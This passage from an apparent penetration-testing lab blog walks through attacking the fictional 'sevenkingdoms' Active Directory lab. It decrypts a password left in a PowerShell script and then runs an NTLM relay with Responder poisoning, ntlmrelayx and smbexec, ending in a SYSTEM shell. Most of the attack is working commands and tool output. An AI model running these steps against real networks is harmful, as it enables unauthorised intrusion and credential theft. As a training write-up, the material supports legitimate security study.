    SMB         10.3.2.11       445    WINTERFELL       -----           -----------     ------
    SMB         10.3.2.11       445    WINTERFELL       ADMIN$                          Remote Admin
    SMB         10.3.2.11       445    WINTERFELL       C$                              Default share
    SMB         10.3.2.11       445    WINTERFELL       IPC$            READ            Remote IPC
    SMB         10.3.2.11       445    WINTERFELL       NETLOGON        READ            Logon server share 
    SMB         10.3.2.11       445    WINTERFELL       SYSVOL          READ            Logon server share 
    SMB         10.3.2.22       445    CASTELBLACK      [*] Enumerated shares
    SMB         10.3.2.22       445    CASTELBLACK      Share           Permissions     Remark
    SMB         10.3.2.22       445    CASTELBLACK      -----           -----------     ------
    SMB         10.3.2.22       445    CASTELBLACK      ADMIN$          READ,WRITE      Remote Admin
    SMB         10.3.2.22       445    CASTELBLACK      all             READ,WRITE      Basic RW share for all
    SMB         10.3.2.22       445    CASTELBLACK      C$              READ,WRITE      Default share
    SMB         10.3.2.22       445    CASTELBLACK      IPC$            READ            Remote IPC
    SMB         10.3.2.22       445    CASTELBLACK      public          READ,WRITE      Basic Read share for all domain users
    Running nxc against 21 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

    That worked fine, and jeor.mormont is even a local administrator on Castelblack (Pwn3d!). But we still have one more file to check out – secret.ps1

    $ cat secret.ps1 
    # cypher script
    # $domain="sevenkingdoms.local"
    # $EncryptionKeyBytes = New-Object Byte[] 32
    # [Security.Cryptography.RNGCryptoServiceProvider]::Create().GetBytes($EncryptionKeyBytes)
    # $EncryptionKeyBytes | Out-File "encryption.key"
    # $EncryptionKeyData = Get-Content "encryption.key"
    # Read-Host -AsSecureString | ConvertFrom-SecureString -Key $EncryptionKeyData | Out-File -FilePath "secret.encrypted"
    
    # secret stored :
    $keyData = 177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247, 41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91
    $secret="76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA="
    
    # T.L. 

    So this is a PowerShell script that defines a few variables. The commented-out part shows how the secret was produced: a random 32-byte key was generated and written to a file, a password was read from the console as a SecureString, and it was encrypted with that key using ConvertFrom-SecureString -Key. Both the key bytes ($keyData) and the resulting ciphertext ($secret) were then left behind in the script.

    We can reverse the process by taking the encrypted string and decrypting it with the key data from the script. The -Key variant does not use DPAPI, so unlike a plain ConvertFrom-SecureString export it can be decrypted on any machine that has the key, not only the one that created it.

    . ./secret.ps1   # dot-source the downloaded file so $keyData and $secret are defined
    $secureString = ConvertTo-SecureString $secret -Key $keyData
    $plain = [System.Net.NetworkCredential]::new("", $secureString).Password
    Write-Host "Decrypted secret: $plain"

    This gives the result: powerkingftw135

    So we have an unknown user, signed "T.L", with the password powerkingftw135. The initials are a lead to match against the user list from recon.
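    Decrypting this does not require PowerShell at all. Here is an added example (not code from the original post) in Python that parses the export format ConvertFrom-SecureString -Key produces: a fixed hex header, then base64 of the UTF-16LE string "2|<base64 IV>|<hex ciphertext>", where the ciphertext is AES-CBC under the raw key bytes (32 bytes, so AES-256) over the PKCS#7-padded UTF-16LE plaintext. The key and ciphertext are copied from secret.ps1 above. The script needs the third-party cryptography package (or pycryptodome as a fallback) for AES.

```python
"""Decrypt a PowerShell ConvertFrom-SecureString -Key export without PowerShell (added example)."""
import base64

try:
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _aes_cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
        dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return dec.update(ct) + dec.finalize()
except ImportError:  # fall back to pycryptodome if that is what is installed
    from Crypto.Cipher import AES

    def _aes_cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
        return AES.new(key, AES.MODE_CBC, iv).decrypt(ct)

# Every keyed SecureString export starts with this constant hex header.
SECURESTRING_MAGIC = "76492d1116743f0423413b16050a5345"


def parse_export(blob: str):
    """Split an export into (iv, ciphertext). The payload after the header is base64 of the
    UTF-16LE text 'version|base64(iv)|hex(ciphertext)'; version 2 is the keyed format."""
    if not blob.startswith(SECURESTRING_MAGIC):
        raise ValueError("not a ConvertFrom-SecureString -Key export")
    inner = base64.b64decode(blob[len(SECURESTRING_MAGIC):]).decode("utf-16-le")
    version, iv_b64, ct_hex = inner.split("|")
    if version != "2":
        raise ValueError(f"unexpected export version {version!r}")
    return base64.b64decode(iv_b64), bytes.fromhex(ct_hex)


def decrypt_securestring(blob: str, key: bytes) -> str:
    """AES-CBC decrypt with the raw $keyData bytes, strip PKCS#7, decode UTF-16LE."""
    iv, ct = parse_export(blob)
    if len(key) not in (16, 24, 32) or len(ct) % 16:
        raise ValueError("key must be 16/24/32 bytes and ciphertext a multiple of 16")
    padded = _aes_cbc_decrypt(key, iv, ct)
    pad = padded[-1]
    if not 1 <= pad <= 16 or padded[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: wrong key or corrupted export")
    return padded[:-pad].decode("utf-16-le")


# Values copied from secret.ps1 found on the NETLOGON share above.
KEY_DATA = bytes([177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247,
                  41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91])
SECRET = ("76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBF"
          "AEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYA"
          "YQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABm"
          "AGEANAAyADkAZgAyADIAMwA=")

if __name__ == "__main__":
    print("Decrypted secret:", decrypt_securestring(SECRET, KEY_DATA))
```

    The padding check is what tells a wrong key apart from a right one: with the wrong key the last block decrypts to noise and the PKCS#7 trailer is almost never valid.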


    NTLM Relay

    Fordi vi ikke klarte å knekke passordet til Eddard Stark, så skal vi prøve å logge inn uten å kunne passordet. Dette angrepet kalles et NTLM Relay angrep.

    First we need a list of hosts that do not require SMB signing, so that we can spoof the origin of an authentication request. (With signing enforced, the session key is derived from the real client's authentication, so a relayed session would be rejected.)

    $ netexec smb 10.3.2.10-30 --gen-relay-list ntlmrelay.netexec 
    SMB         10.3.2.12       445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) 
    SMB         10.3.2.10       445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False) 
    SMB         10.3.2.11       445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) 
    SMB         10.3.2.22       445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False) 
    SMB         10.3.2.23       445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) 
    Running nxc against 21 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
    

    We check the contents of ntlmrelay.netexec and see that 10.3.2.22 and 10.3.2.23 are vulnerable.

    $ cat ntlmrelay.netexec   
    10.3.2.22
    10.3.2.23
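    As an added example (not part of the original post or of netexec itself), here is a Python parser for the netexec SMB lines shown above. It makes the same selection that --gen-relay-list makes and adds a per-domain summary that a defender can hand to whoever owns SMB hardening. The sample input is the five scan lines from above, embedded as a constructed string.

```python
import re
from collections import defaultdict

# Constructed sample: the five host lines netexec printed above (progress bar omitted).
NXC_OUTPUT = """\
SMB         10.3.2.12       445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB         10.3.2.10       445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         10.3.2.11       445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         10.3.2.22       445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB         10.3.2.23       445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
"""

# One netexec SMB banner line: protocol, ip, port, hostname, then the parenthesised attributes.
LINE_RE = re.compile(
    r'^SMB\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]\s+'
    r'(?P<os>.*?)\s+\(name:(?P<name>[^)]+)\)\s+\(domain:(?P<domain>[^)]+)\)\s+'
    r'\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)')


def parse_nxc_smb(text):
    """Parse netexec SMB output into one dict per host; lines that do not match are skipped."""
    hosts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        h = m.groupdict()
        h["signing"] = h["signing"] == "True"
        h["smbv1"] = h["smbv1"] == "True"
        hosts.append(h)
    return hosts


def relay_targets(hosts):
    """The same selection --gen-relay-list makes: hosts that accept unsigned SMB sessions."""
    return [h["ip"] for h in hosts if not h["signing"]]


def signing_report(hosts):
    """Per-domain count of signed/unsigned hosts and hosts still offering SMBv1."""
    report = defaultdict(lambda: {"signed": 0, "unsigned": 0, "smbv1": 0})
    for h in hosts:
        entry = report[h["domain"]]
        entry["signed" if h["signing"] else "unsigned"] += 1
        if h["smbv1"]:
            entry["smbv1"] += 1
    return dict(report)


if __name__ == "__main__":
    found = parse_nxc_smb(NXC_OUTPUT)
    print("relayable (signing not required):", relay_targets(found))
    for domain, counts in signing_report(found).items():
        print(f"{domain}: {counts}")
```

    Domain controllers require SMB signing by default, which is why the three DCs show signing:True while the two member servers do not; on member servers the fix is the "Microsoft network server: Digitally sign communications (always)" policy, and the SMBv1:True hosts are worth reporting in the same pass.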

    We want to use Responder together with NTLMRelayX for this attack, so we set up NTLMRelayX to keep the relayed sessions in a SOCKS proxy for us.

    $ ntlmrelayx.py -socks -smb2support -tf ./ntlmrelay.netexec                                                       
    
    [*] Protocol Client IMAP loaded..
    [*] Protocol Client IMAPS loaded..
    [*] Protocol Client LDAP loaded..
    [*] Protocol Client LDAPS loaded..
    [*] Protocol Client SMTP loaded..
    [*] Protocol Client HTTPS loaded..
    [*] Protocol Client HTTP loaded..
    [*] Protocol Client MSSQL loaded..
    [*] Protocol Client SMB loaded..
    [*] Protocol Client DCSYNC loaded..
    [*] Protocol Client RPC loaded..
    [*] Running in relay mode to hosts in targetfile
    [*] SOCKS proxy started. Listening on 127.0.0.1:1080
    [*] IMAP Socks Plugin loaded..
    [*] LDAPS Socks Plugin loaded..
    [*] SMTP Socks Plugin loaded..
    [*] LDAP Socks Plugin loaded..
    [*] HTTPS Socks Plugin loaded..
    [*] MSSQL Socks Plugin loaded..
    [*] HTTP Socks Plugin loaded..
    [*] IMAPS Socks Plugin loaded..
    [*] SMB Socks Plugin loaded..
    [*] Setting up SMB Server on port 445
    [*] Setting up HTTP Server on port 80
     * Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
     * Debug mode: off
    [*] Setting up WCF Server on port 9389
    [*] Setting up RAW Server on port 6666
    [*] Multirelay enabled
    
    [*] Servers started, waiting for connections

    NTLMRelayX is up, ready to relay to the vulnerable hosts and to keep the sessions in a SOCKS proxy we can use. To use them we must configure proxychains to go through that proxy.

    $ sudo nano /etc/proxychains4.conf
    
    socks4 127.0.0.1 1080  # Add at the end of the file.

    We also have to turn off SMB in Responder (the SMB = Off setting below), since we want the authentication request to reach ntlmrelayx and be forwarded rather than be answered by Responder itself.

    $ sudo nano /etc/responder/Responder.conf
    
    # Make sure the following settings are set:
    
    ; Poisoners to start
    MDNS  = On
    LLMNR = On
    NBTNS = On
    
    ; Servers to start
    SMB      = Off

    Now we can try to poison LLMNR, NetBIOS and mDNS requests on the network, hoping to trick Eddard Stark into letting us relay his NTLMv2 hash to the Castelblack and Braavos servers.

    $ sudo responder -I vxlan100             
                                             __
      .----.-----.-----.-----.-----.-----.--|  |.-----.----.
      |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
      |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                       |__|
    
    
    [+] Poisoners:
        LLMNR                      [ON]
        NBT-NS                     [ON]
        MDNS                       [ON]
        DNS                        [ON]
        DHCP                       [OFF]
    
    [+] Servers:
        HTTP server                [OFF]
        HTTPS server               [ON]
        WPAD proxy                 [OFF]
        Auth proxy                 [OFF]
        SMB server                 [OFF]
        Kerberos server            [ON]
        SQL server                 [ON]
        FTP server                 [ON]
        IMAP server                [ON]
        POP3 server                [ON]
        SMTP server                [ON]
        DNS server                 [ON]
        LDAP server                [ON]
        MQTT server                [ON]
        RDP server                 [ON]
        DCE-RPC server             [ON]
        WinRM server               [ON]
        SNMP server                [ON]
    
    [+] HTTP Options:
        Always serving EXE         [OFF]
        Serving EXE                [OFF]
        Serving HTML               [OFF]
        Upstream Proxy             [OFF]
    
    [+] Poisoning Options:
        Analyze Mode               [OFF]
        Force WPAD auth            [OFF]
        Force Basic Auth           [OFF]
        Force LM downgrade         [OFF]
        Force ESS downgrade        [OFF]
    
    [+] Generic Options:
        Responder NIC              [vxlan100]
        Responder IP               [10.3.2.109]
        Responder IPv6             [fe80::d80d:5cff:fe13:4f43]
        Challenge set              [1122334455667788]
        Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
        Don't Respond To MDNS TLD  ['_DOSVC']
        TTL for poisoned response  [default]
    
    [+] Current Session Variables:
        Responder Machine Name     [WIN-154FN4YSOQU]
        Responder Domain Name      [BC6R.LOCAL]
        Responder DCE-RPC Port     [48223]
    
    [*] Version: Responder 3.1.7.0
    [*] Author: Laurent Gaffie, <[email protected]>
    [*] To sponsor Responder: https://paypal.me/PythonResponder
    
    [+] Listening for events... 

    After a little while we see the following, at roughly the same time in Responder and in ntlmrelayx:

    # Responder
    [*] [NBT-NS] Poisoned answer sent to 10.3.2.11 for name MEREN (service: File Server)
    [*] [MDNS] Poisoned answer sent to 10.3.2.11       for name Meren.local
    [*] [MDNS] Poisoned answer sent to 10.3.2.11       for name Meren.local
    [*] [LLMNR]  Poisoned answer sent to 10.3.2.11 for name Meren
    [*] [LLMNR]  Poisoned answer sent to 10.3.2.11 for name Meren
    [*] [MDNS] Poisoned answer sent to 10.3.2.11       for name Meren.local
    [*] [MDNS] Poisoned answer sent to 10.3.2.11       for name Meren.local
    [*] [LLMNR]  Poisoned answer sent to 10.3.2.11 for name Meren
    [*] [LLMNR]  Poisoned answer sent to 10.3.2.11 for name Meren
    [*] [LLMNR]  Poisoned answer sent to 10.3.2.11 for name Bravos
    [*] [MDNS] Poisoned answer sent to 10.3.2.11       for name Bravos.local
    [*] [NBT-NS] Poisoned answer sent to 10.3.2.11 for name BRAVOS (service: File Server)
    [*] [MDNS] Poisoned answer sent to 10.3.2.11       for name Bravos.local
    [*] [LLMNR]  Poisoned answer sent to 10.3.2.11 for name Bravos
    [*] [MDNS] Poisoned answer sent to 10.3.2.11       for name Meren.local
    [*] [MDNS] Poisoned answer sent to 10.3.2.11       for name Meren.local
    [*] [LLMNR]  Poisoned answer sent to 10.3.2.11 for name Meren
    [*] [LLMNR]  Poisoned answer sent to 10.3.2.11 for name Meren
    [*] [MDNS] Poisoned answer sent to 10.3.2.11       for name Bravos.local
    [*] [MDNS] Poisoned answer sent to 10.3.2.11       for name Bravos.local
    [*] [LLMNR]  Poisoned answer sent to 10.3.2.11 for name Bravos
    [*] [LLMNR]  Poisoned answer sent to 10.3.2.11 for name Bravos
    [*] [MDNS] Poisoned answer sent to 10.3.2.11       for name Bravos.local
    [*] [MDNS] Poisoned answer sent to 10.3.2.11       for name Bravos.local
    [*] [LLMNR]  Poisoned answer sent to 10.3.2.11 for name Bravos
    [*] [LLMNR]  Poisoned answer sent to 10.3.2.11 for name Bravos
    [*] [MDNS] Poisoned answer sent to 10.3.2.11       for name Bravos.local
    [*] [MDNS] Poisoned answer sent to 10.3.2.11       for name Bravos.local
    [*] [LLMNR]  Poisoned answer sent to 10.3.2.11 for name Bravos
    [*] [LLMNR]  Poisoned answer sent to 10.3.2.11 for name Bravos
    [*] [MDNS] Poisoned answer sent to 10.3.2.11       for name Bravos.local
    [*] [MDNS] Poisoned answer sent to 10.3.2.11       for name Bravos.local
    [*] [LLMNR]  Poisoned answer sent to 10.3.2.11 for name Bravos
    [*] [LLMNR]  Poisoned answer sent to 10.3.2.11 for name Bravos
    # NTLMRelayX
    
    []
    [*] SMBD-Thread-32 (process_request_thread): Connection from NORTH/[email protected] controlled, attacking target smb://10.3.2.22
    [*] Authenticating against smb://10.3.2.22 as NORTH/EDDARD.STARK SUCCEED
    [*] SOCKS: Adding NORTH/[email protected](445) to active SOCKS connection. Enjoy
    []
    [*] SMBD-Thread-32 (process_request_thread): Connection from NORTH/[email protected] controlled, attacking target smb://10.3.2.23
    [*] Authenticating against smb://10.3.2.23 as NORTH/EDDARD.STARK SUCCEED
    [*] SOCKS: Adding NORTH/[email protected](445) to active SOCKS connection. Enjoy
    [*] All targets processed!
    [*] SMBD-Thread-32 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left!
    [*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication
    [*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication
    [*] All targets processed!
    [*] SMBD-Thread-33 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left!
    [*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
    [*] All targets processed!
    [*] SMBD-Thread-34 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left!
    [*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication
    [*] All targets processed!
    [*] SMBD-Thread-35 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left!
    [*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication
    [*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
    [*] All targets processed!
    [*] SMBD-Thread-36 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left!
    [*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
    [*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
    [*] All targets processed!
    [*] SMBD-Thread-37 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left!
    [*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
    [*] All targets processed!
    [*] SMBD-Thread-38 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left!
    [*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
    [*] All targets processed!
    [*] SMBD-Thread-39 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left!
    [*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
    

    So we have intercepted sessions for Eddard and Robb Stark and managed to establish a session on Eddard Stark's behalf against both servers; the socks command in the ntlmrelayx console shows that he is an administrator on 10.3.2.22, which is the Castelblack server.

    socks
    Protocol  Target     Username            AdminStatus  Port 
    --------  ---------  ------------------  -----------  ----
    SMB       10.3.2.22  NORTH/EDDARD.STARK  TRUE         445  
    SMB       10.3.2.23  NORTH/EDDARD.STARK  FALSE        445

    We run smbexec.py through the established session over proxychains and see that we have access as NT AUTHORITY\SYSTEM on the Castelblack server.

    $ proxychains4 -q smbexec.py NORTH/[email protected]
    
    Password: # leave the password empty here, just press Enter.
    [!] Launching semi-interactive shell - Careful what you execute
    C:\Windows\system32>whoami
    nt authority\system
    
    C:\Windows\system32>hostname
    castelblack

    So we have a shell on the machine as SYSTEM and can essentially do whatever we like on it, for example add an administrator account that we control, turn off Defender and install malware, or many other things.

    In the next post we will look at how to move around the environment and gain ever higher levels of access.